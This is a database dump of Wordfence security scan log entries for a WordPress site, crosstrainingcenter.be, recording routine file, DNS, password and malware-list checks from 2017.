(117081, 1491767391.022730, 1, 'info', 'Contacting Wordfence to initiate scan'),
(117082, 1491767391.907387, 2, 'info', 'Getting plugin list from WordPress'),
(117083, 1491767392.068163, 2, 'info', 'Found 14 plugins'),
(117084, 1491767392.076499, 2, 'info', 'Getting theme list from WordPress'),
(117085, 1491767392.131421, 2, 'info', 'Found 4 themes'),
(117602, 1492058791.946313, 1, 'info', '-------------------'),
(117603, 1492058791.946782, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 43891 records in 33 seconds.'),
(118011, 1492280427.111542, 2, 'info', 'Scanned contents of 27 additional files at 24.01 per second'),
(118012, 1492280428.223044, 2, 'info', 'Scanned contents of 39 additional files at 17.44 per second'),
(118013, 1492280429.285101, 2, 'info', 'Scanned contents of 86 additional files at 26.07 per second'),
(118014, 1492280429.287965, 2, 'info', 'Scanned contents of 86 additional files at 26.05 per second'),
(118015, 1492280429.288560, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117596, 1492058791.428211, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117094, 1491767395.762669, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117095, 1491767396.103520, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117096, 1491767396.423575, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(117097, 1491767396.765648, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117098, 1491767397.083388, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(118134, 1492290942.755868, 1, 'info', '-------------------'),
(118135, 1492290942.756904, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 44556 records in 27 seconds.'),
(118133, 1492290942.720591, 10, 'info', 'SUM_ENDBAD:Scanning for old themes, plugins and core files'),
(117043, 1491750767.339717, 2, 'info', 'Done URL check.'),
(118097, 1492290934.836174, 10, 'info', 'SUM_START:Scanning file contents for infections and vulnerabilities'),
(117986, 1492280416.009392, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117987, 1492280416.317913, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117985, 1492280415.633519, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117984, 1492280415.260157, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117186, 1491821925.701428, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117184, 1491821925.107147, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117185, 1491821925.372183, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(117538, 1492058773.572644, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117183, 1491821924.839731, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117626, 1492072410.730956, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117982, 1492280414.490925, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117983, 1492280414.827490, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(117540, 1492058774.025212, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117539, 1492058773.814000, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(116968, 1491702320.202869, 2, 'info', 'Starting password strength check on 3 users.'),
(117771, 1492108252.873984, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117275, 1491886398.940250, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117276, 1491886399.291372, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117277, 1491886399.572694, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117894, 1492265527.080499, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117895, 1492265527.363531, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(117896, 1492265527.732477, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117897, 1492265528.051836, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117569, 1492058787.257201, 2, 'info', 'Scanned contents of 81 additional files at 24.92 per second'),
(117568, 1492058786.198437, 2, 'info', 'Scanned contents of 39 additional files at 17.80 per second'),
(117159, 1491767415.216514, 1, 'info', '-------------------'),
(117160, 1491767415.223357, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 43955 records in 34 seconds.'),
(117567, 1492058785.118303, 2, 'info', 'Scanned contents of 28 additional files at 25.19 per second'),
(117162, 1491767415.233064, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117824, 1492193124.322762, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117825, 1492193124.638232, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(117759, 1492108250.642111, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117281, 1491886400.905530, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117395, 1491943544.765756, 2, 'info', 'Done host key check.'),
(117278, 1491886399.924260, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117279, 1491886400.326996, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117280, 1491886400.692924, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117684, 1492072423.842626, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117683, 1492072423.839265, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117682, 1492072423.829861, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(118131, 1492290942.705937, 10, 'info', 'SUM_ENDOK:Scanning to check available disk space'),
(117695, 1492108217.682129, 1, 'info', 'Scheduled Wordfence scan starting at Thursday 13th of April 2017 06:30:17 PM'),
(117424, 1491943547.789546, 1, 'info', '-------------------'),
(117425, 1491943547.789965, 1, 'info', 'Scan Complete. Scanned 2410 files, 14 plugins, 4 themes, 11 pages, 145 comments and 43756 records in 28 seconds.'),
(117828, 1492193125.190994, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117195, 1491821929.057044, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117947, 1492265544.127556, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(118117, 1492290941.436337, 10, 'info', 'SUM_START:Scanning comments for URL\'s in Google\'s Safe Browsing List'),
(118118, 1492290941.533182, 10, 'info', 'SUM_ENDOK:Scanning comments for URL\'s in Google\'s Safe Browsing List'),
(117948, 1492265544.130159, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117949, 1492265544.145077, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117194, 1491821928.572418, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(118230, 1493417858.951838, 2, 'info', 'Scanning comment with Author: Elisa Brown Email: exhneloegrv@fqehdcymi.com Source IP: 205.185.209.130 '),
(118231, 1493417859.034577, 2, 'info', 'Checking 5 host keys against Wordfence scanning servers.'),
(117951, 1492265544.146018, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117950, 1492265544.145632, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117193, 1491821928.023667, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117647, 1492072415.005511, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(117648, 1492072415.161210, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117649, 1492072415.373755, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(117650, 1492072415.395795, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117981, 1492280414.207158, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117980, 1492280413.992245, 10, 'info', 'SUM_START:Scanning for known malware files'),
(117979, 1492280413.988584, 10, 'info', 'SUM_DISABLED:Skipping plugin scan'),
(117978, 1492280413.987919, 10, 'info', 'SUM_DISABLED:Skipping theme scan'),
(117655, 1492072416.307469, 2, 'info', 'Starting scan of file contents'),
(117656, 1492072417.312043, 2, 'info', 'Scanned contents of 27 additional files at 26.97 per second'),
(117657, 1492072418.318610, 2, 'info', 'Scanned contents of 37 additional files at 18.43 per second'),
(117658, 1492072419.355622, 2, 'info', 'Scanned contents of 65 additional files at 21.35 per second'),
(117659, 1492072419.648399, 2, 'info', 'Scanned contents of 86 additional files at 25.77 per second'),
(117660, 1492072419.648875, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117661, 1492072419.652074, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117196, 1491821929.367479, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117197, 1491821929.595701, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117198, 1491821929.949009, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117199, 1491821930.347743, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(118104, 1492290938.775253, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117381, 1491943539.537198, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(116993, 1491750748.480521, 1, 'info', 'Contacting Wordfence to initiate scan'),
(116994, 1491750749.333955, 2, 'info', 'Getting plugin list from WordPress'),
(117504, 1491988781.493394, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117503, 1491988781.490932, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117502, 1491988781.490219, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(118066, 1492290929.978600, 10, 'info', 'SUM_START:Comparing core WordPress files against originals in repository'),
(117544, 1492058775.377868, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117791, 1492193111.771099, 1, 'info', 'Contacting Wordfence to initiate scan'),
(117499, 1491988780.403220, 2, 'info', 'Starting password strength check on 3 users.'),
(118028, 1492280432.007951, 10, 'info', 'SUM_ENDOK:Scanning posts for URL\'s in Google\'s Safe Browsing List'),
(118027, 1492280431.991181, 2, 'info', 'Done examining URls'),
(117545, 1492058775.684144, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117546, 1492058776.052070, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117132, 1491767412.678924, 2, 'info', 'Done URL check.'),
(117133, 1491767412.705122, 2, 'info', 'Done file contents scan'),
(117024, 1491750758.802614, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117685, 1492072423.842962, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(118085, 1492290932.824710, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117541, 1492058774.280066, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117028, 1491750761.436906, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117220, 1491821939.857681, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117221, 1491821940.700548, 2, 'info', 'Done URL check.'),
(117222, 1491821940.728268, 2, 'info', 'Done file contents scan'),
(118038, 1492280433.187469, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(118039, 1492280433.187975, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(118040, 1492280433.188939, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117226, 1491821940.807696, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117027, 1491750761.200217, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(117026, 1491750760.948140, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117025, 1491750759.908265, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117228, 1491821941.648959, 2, 'info', 'Done host key check.'),
(117227, 1491821940.809869, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117229, 1491821941.649551, 2, 'info', 'Done examining URls'),
(118041, 1492280433.191573, 10, 'info', 'SUM_ENDOK:Scanning DNS for unauthorized changes'),
(117528, 1492058769.611893, 2, 'info', 'Found 4 themes'),
(117526, 1492058769.552193, 2, 'info', 'Found 14 plugins'),
(117527, 1492058769.555456, 2, 'info', 'Getting theme list from WordPress'),
(118042, 1492280433.198645, 10, 'info', 'SUM_START:Scanning to check available disk space'),
(117524, 1492058768.614706, 1, 'info', 'Contacting Wordfence to initiate scan'),
(117525, 1492058769.456780, 2, 'info', 'Getting plugin list from WordPress'),
(117049, 1491750767.426320, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(118094, 1492290934.793434, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117048, 1491750767.425344, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117363, 1491943534.183636, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117364, 1491943534.370566, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117365, 1491943534.566478, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117366, 1491943534.752599, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117044, 1491750767.374963, 2, 'info', 'Done file contents scan'),
(118095, 1492290934.795075, 10, 'info', 'SUM_ENDOK:Comparing core WordPress files against originals in repository'),
(118096, 1492290934.799850, 10, 'info', 'SUM_ENDOK:Scanning for known malware files'),
(118132, 1492290942.709620, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(116962, 1491702319.849129, 2, 'info', 'Done host key check.'),
(116963, 1491702319.851648, 2, 'info', 'Done examining URls'),
(117766, 1492108251.646163, 2, 'info', 'Starting password strength check on 3 users.'),
(117259, 1491886393.377639, 1, 'info', 'Contacting Wordfence to initiate scan'),
(117260, 1491886394.271708, 2, 'info', 'Getting plugin list from WordPress'),
(117261, 1491886394.462826, 2, 'info', 'Found 14 plugins'),
(117262, 1491886394.466205, 2, 'info', 'Getting theme list from WordPress'),
(117263, 1491886394.571032, 2, 'info', 'Found 4 themes'),
(117770, 1492108252.872114, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117769, 1492108252.871201, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(118130, 1492290942.704386, 10, 'info', 'SUM_START:Scanning to check available disk space'),
(118129, 1492290942.699680, 10, 'info', 'SUM_ENDOK:Scanning DNS for unauthorized changes'),
(117204, 1491821934.216797, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(118123, 1492290942.687744, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(118124, 1492290942.688367, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(118125, 1492290942.690259, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(118126, 1492290942.696345, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(118127, 1492290942.696904, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(118128, 1492290942.697224, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(118212, 1492320260.806505, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(118211, 1492320260.805518, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(118210, 1492320260.804928, 10, 'info', 'SUM_START:Scanning DNS for unauthorized changes'),
(117507, 1491988781.505653, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117505, 1491988781.504656, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117506, 1491988781.505173, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117917, 1492265536.105072, 2, 'info', 'Analyzed 2413 files containing 37.68 MB of data.'),
(117383, 1491943540.032937, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(117384, 1491943540.052812, 2, 'info', 'Analyzed 2410 files containing 37.68 MB of data.'),
(118103, 1492290938.773453, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117617, 1492072407.499990, 2, 'info', 'Found 4 themes'),
(117460, 1491988767.465998, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117461, 1491988767.783891, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117462, 1491988767.994463, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117463, 1491988768.325890, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117464, 1491988768.662350, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117465, 1491988769.943266, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117106, 1491767400.146027, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117008, 1491750753.198630, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(117009, 1491750753.421021, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(118236, 1497408788.165362, 2, 'info', 'Scanning comment with Author: Sarah Hughes Email: ghfqfdsus@tqlqjagzcz.com Source IP: 196.52.32.11 '),
(118119, 1492290941.536714, 10, 'info', 'SUM_START:Scanning for weak passwords'),
(118120, 1492290941.537698, 2, 'info', 'Starting password strength check on 3 users.'),
(118121, 1492290942.668169, 10, 'info', 'SUM_ENDOK:Scanning for weak passwords'),
(118122, 1492290942.687227, 10, 'info', 'SUM_START:Scanning DNS for unauthorized changes'),
(117559, 1492058782.453999, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117560, 1492058783.038004, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(118141, 1492320233.520096, 10, 'info', 'SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),
(117418, 1491943547.710171, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117591, 1492058791.418049, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(118022, 1492280431.034024, 10, 'info', 'SUM_ENDOK:Scanning files for URLs in Google\'s Safe Browsing List'),
(118021, 1492280431.030800, 10, 'info', 'SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),
(118019, 1492280431.004129, 2, 'info', 'Done URL check.'),
(118020, 1492280431.028389, 2, 'info', 'Done file contents scan'),
(118018, 1492280430.163039, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117588, 1492058790.236607, 2, 'info', 'Starting password strength check on 3 users.'),
(118017, 1492280430.161222, 2, 'info', 'Done host key check.'),
(118016, 1492280429.290020, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117109, 1491767400.991653, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117108, 1491767400.672147, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117107, 1491767400.444909, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117013, 1491750754.468363, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117011, 1491750753.881624, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117012, 1491750754.113024, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117010, 1491750753.660974, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117931, 1492265541.952396, 2, 'info', 'Done file contents scan'),
(118239, 1498328932.807493, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(118238, 1498328932.705047, 2, 'info', 'Scanning comment with Author: Ann Weaver Email: idllhldszt@gouxwnil.com Source IP: 205.185.209.188 '),
(117935, 1492265542.015611, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117936, 1492265542.016988, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117937, 1492265542.864279, 2, 'info', 'Done host key check.'),
(117938, 1492265542.864965, 2, 'info', 'Done examining URls'),
(118146, 1492320242.108195, 2, 'info', 'Getting plugin list from WordPress'),
(118147, 1492320242.320886, 2, 'info', 'Found 14 plugins'),
(118148, 1492320242.325524, 2, 'info', 'Getting theme list from WordPress'),
(118149, 1492320242.401145, 2, 'info', 'Found 4 themes'),
(118150, 1492320242.428639, 10, 'info', 'SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),
(118151, 1492320243.887912, 10, 'info', 'SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),
(117869, 1492193133.864250, 1, 'info', '-------------------'),
(117870, 1492193133.865086, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 44193 records in 31 seconds.'),
(117150, 1491767415.047326, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117149, 1491767415.044037, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(118044, 1492280433.209292, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(117975, 1492280412.472192, 10, 'info', 'SUM_START:Fetching list of known malware files from Wordfence'),
(117390, 1491943541.977046, 2, 'info', 'Scanned contents of 28 additional files at 26.95 per second'),
(117669, 1492072421.441390, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117237, 1491821943.370195, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(117758, 1492108250.641222, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117748, 1492108248.830718, 2, 'info', 'Scanned contents of 86 additional files at 24.59 per second'),
(117749, 1492108248.831114, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117750, 1492108248.832154, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117751, 1492108249.723140, 2, 'info', 'Done host key check.'),
(117752, 1492108249.724242, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117753, 1492108250.573917, 2, 'info', 'Done URL check.'),
(117754, 1492108250.592078, 2, 'info', 'Done file contents scan'),
(117965, 1492280404.717965, 10, 'info', 'SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),
(118098, 1492290934.845552, 10, 'info', 'SUM_START:Scanning files for URLs in Google\'s Safe Browsing List'),
(117021, 1491750756.834994, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117566, 1492058784.004209, 2, 'info', 'Starting scan of file contents'),
(117837, 1492193129.272119, 2, 'info', 'Scanned contents of 86 additional files at 27.09 per second'),
(117838, 1492193129.275416, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117839, 1492193129.280701, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117840, 1492193130.151500, 2, 'info', 'Done host key check.'),
(117841, 1492193130.152802, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117842, 1492193131.023686, 2, 'info', 'Done URL check.'),
(117843, 1492193131.040231, 2, 'info', 'Done file contents scan'),
(117847, 1492193131.292676, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117848, 1492193131.297776, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117849, 1492193132.147822, 2, 'info', 'Done host key check.'),
(117850, 1492193132.148298, 2, 'info', 'Done examining URls'),
(117855, 1492193132.253076, 2, 'info', 'Starting password strength check on 3 users.'),
(117405, 1491943546.548388, 2, 'info', 'Done examining URls'),
(117404, 1491943546.547075, 2, 'info', 'Done host key check.'),
(117663, 1492072420.509485, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117664, 1492072421.371898, 2, 'info', 'Done URL check.'),
(117665, 1492072421.392827, 2, 'info', 'Done file contents scan'),
(117977, 1492280413.987367, 10, 'info', 'SUM_START:Comparing core WordPress files against originals in repository'),
(117976, 1492280413.977641, 10, 'info', 'SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),
(117174, 1491821921.444855, 2, 'info', 'Found 4 themes'),
(117792, 1492193112.619094, 2, 'info', 'Getting plugin list from WordPress'),
(117173, 1491821921.392377, 2, 'info', 'Getting theme list from WordPress'),
(117172, 1491821921.388689, 2, 'info', 'Found 14 plugins'),
(117793, 1492193112.647026, 2, 'info', 'Found 14 plugins'),
(117794, 1492193112.654556, 2, 'info', 'Getting theme list from WordPress'),
(117491, 1491988779.380584, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117492, 1491988779.381422, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117493, 1491988780.262521, 2, 'info', 'Done host key check.'),
(117494, 1491988780.262933, 2, 'info', 'Done examining URls'),
(117795, 1492193112.703884, 2, 'info', 'Found 4 themes'),
(118152, 1492320243.894129, 10, 'info', 'SUM_START:Fetching list of known malware files from Wordfence'),
(118153, 1492320245.399776, 10, 'info', 'SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),
(118154, 1492320245.409509, 10, 'info', 'SUM_START:Comparing core WordPress files against originals in repository'),
(118155, 1492320245.410023, 10, 'info', 'SUM_DISABLED:Skipping theme scan'),
(118156, 1492320245.410620, 10, 'info', 'SUM_DISABLED:Skipping plugin scan'),
(118157, 1492320245.412914, 10, 'info', 'SUM_START:Scanning for known malware files'),
(118158, 1492320245.840743, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(118159, 1492320246.137939, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(118160, 1492320246.335319, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(118161, 1492320246.541168, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(118225, 1492320262.099076, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(118224, 1492320262.093970, 10, 'info', 'SUM_FINAL:Scan complete. You have 6 new issues to fix. See below.'),
(118223, 1492320262.093607, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 44711 records in 31 seconds.'),
(118222, 1492320262.093119, 1, 'info', '-------------------'),
(118221, 1492320260.841017, 10, 'info', 'SUM_ENDBAD:Scanning for old themes, plugins and core files'),
(117056, 1491750768.450014, 2, 'info', 'Starting password strength check on 3 users.'),
(117718, 1492108234.525514, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117717, 1492108233.841452, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(117716, 1492108233.493960, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117715, 1492108233.158861, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117360, 1491943533.524607, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117361, 1491943533.741929, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117362, 1491943534.006668, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(117051, 1491750768.292755, 2, 'info', 'Done examining URls'),
(117050, 1491750768.292253, 2, 'info', 'Done host key check.'),
(117629, 1492072411.242623, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117627, 1492072410.916567, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117628, 1492072411.120302, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(118216, 1492320260.816880, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(118215, 1492320260.816320, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(118213, 1492320260.808762, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(118214, 1492320260.815851, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(118217, 1492320260.818970, 10, 'info', 'SUM_ENDOK:Scanning DNS for unauthorized changes'),
(118218, 1492320260.822994, 10, 'info', 'SUM_START:Scanning to check available disk space'),
(118219, 1492320260.825281, 10, 'info', 'SUM_ENDOK:Scanning to check available disk space'),
(118220, 1492320260.829670, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(117328, 1491886415.734967, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117783, 1492108252.953006, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117105, 1491767399.637406, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117967, 1492280410.042553, 10, 'info', 'SUM_ENDOK:Scanning your site for the HeartBleed vulnerability'),
(117517, 1492058757.726243, 1, 'info', 'Scheduled Wordfence scan starting at Thursday 13th of April 2017 04:45:57 AM'),
(117248, 1491821944.013237, 1, 'info', '-------------------'),
(117637, 1492072412.604319, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117636, 1492072412.422741, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117249, 1491821944.013644, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 44382 records in 34 seconds.'),
(117251, 1491821944.024332, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117061, 1491750769.524373, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117020, 1491750756.264262, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117484, 1491988778.459447, 2, 'info', 'Done host key check.'),
(117485, 1491988778.460677, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117170, 1491821920.355384, 1, 'info', 'Contacting Wordfence to initiate scan'),
(118064, 1492290928.458440, 10, 'info', 'SUM_START:Fetching list of known malware files from Wordfence'),
(117966, 1492280406.732403, 10, 'info', 'SUM_START:Scanning your site for the HeartBleed vulnerability'),
